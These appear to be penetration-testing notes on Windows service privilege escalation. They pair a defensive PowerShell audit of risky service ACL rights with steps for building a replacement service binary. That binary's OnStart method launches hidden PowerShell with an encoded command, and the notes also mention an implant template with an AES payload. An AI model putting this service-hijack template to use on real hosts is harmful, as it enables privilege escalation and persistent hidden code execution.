https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/
Viewing Service ACLs using PowerShell
Use the Get-ServiceACL script, and run:

    'FakeService' | Get-ServiceAcl | Select-Object -ExpandProperty Access
If the service permissions allow us to start, stop or change config, we can modify the service permissions.
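The same condition can be audited defensively. The following is an added example, not part of the original notes or the Get-ServiceAcl script: it parses a service's SDDL string and reports allow ACEs that give principals other than LocalSystem and Administrators change-config, WRITE_DAC or WRITE_OWNER rights. The function name Get-RiskyServiceAce, the trusted-SID list and the sample SDDL are assumptions made for illustration.

```powershell
# Added example (not from the original notes). Access mask bits from winsvc.h / winnt.h.
$DangerousRights = [ordered]@{
    ChangeConfig = 0x00000002   # SERVICE_CHANGE_CONFIG: binary path and logon account can be changed
    WriteDac     = 0x00040000   # WRITE_DAC: the service DACL itself can be rewritten
    WriteOwner   = 0x00080000   # WRITE_OWNER: ownership can be taken
    GenericAll   = 0x10000000
    GenericWrite = 0x40000000
}

function Get-RiskyServiceAce {   # hypothetical helper name
    param(
        [Parameter(Mandatory)] [string] $ServiceName,
        [Parameter(Mandatory)] [string] $Sddl,
        # Assumption: only LocalSystem and BUILTIN\Administrators should hold these rights
        [string[]] $TrustedSid = @('S-1-5-18', 'S-1-5-32-544')
    )
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only allow ACEs grant rights; deny and audit entries are skipped
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if ($TrustedSid -contains $ace.SecurityIdentifier.Value) { continue }
        $hits = $DangerousRights.Keys | Where-Object { $ace.AccessMask -band $DangerousRights[$_] }
        if ($hits) {
            [pscustomobject]@{
                Service = $ServiceName
                Sid     = $ace.SecurityIdentifier.Value
                Rights  = $hits -join ','
                Mask    = '0x{0:X8}' -f $ace.AccessMask
            }
        }
    }
}

# Constructed SDDL for the 'FakeService' name used above: Authenticated Users (AU)
# are granted DC (change config) in addition to start/stop.
# On a live host the real string comes from: sc.exe sdshow FakeService
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRC;;;AU)'
Get-RiskyServiceAce -ServiceName 'FakeService' -Sddl $sample | Format-Table -AutoSize
```

Any row returned for a broad group such as S-1-5-11 (Authenticated Users) marks a service whose DACL should be tightened, for example with sc.exe sdset.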
We can use Visual Studio to create a new service binary with the settings we want.
Start a new Visual Studio project of the 'Windows Service (.NET Framework)' type and choose a name for the service project.
In the new window, click 'Service1.cs' and then 'View Code'.
Then add this to the OnStart method to launch PowerShell code:
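    // Requires "using System.Diagnostics;" at the top of Service1.cs.
    protected override void OnStart(string[] args)
    {
        // Verbatim string (@"..."), so backslashes are not doubled.
        var processStartInfo = new ProcessStartInfo
        {
            FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            // <blah> is the placeholder for the encoded command.
            Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <blah>"
        };
        var process = new Process
        {
            StartInfo = processStartInfo
        };
        process.Start();
        // Blocks OnStart until the child process exits.
        process.WaitForExit();
        process.Dispose();
    }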
An example can be found here:
https://docs.microsoft.com/en-us/dotnet/framework/windows-services/walkthrough-creating-a-windows-service-application-in-the-component-designer
Located in the LPE\implant folder under implantsrv.cpp.
Currently it only sleeps for 30 seconds, but he included the template for AES payload. Compile using compileSrv.bat.